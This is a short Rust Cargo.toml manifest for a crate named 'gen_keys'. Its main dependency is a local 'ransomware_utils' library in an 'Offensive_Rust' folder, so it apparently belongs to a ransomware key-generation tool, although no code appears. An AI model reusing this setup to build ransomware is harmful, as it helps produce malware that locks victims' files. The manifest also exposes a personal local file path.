[package]
name = "gen_keys"
version = "0.1.0"
edition = "2021"

[dependencies]
ransomware_utils = {path = "C:/Users/sebas/source/repos/Rust/Offensive_Rust/ransomware_utils"}
base64ct = "*"
clap = { version = "4.5.19", features = ["derive"] }
walkdir = "*"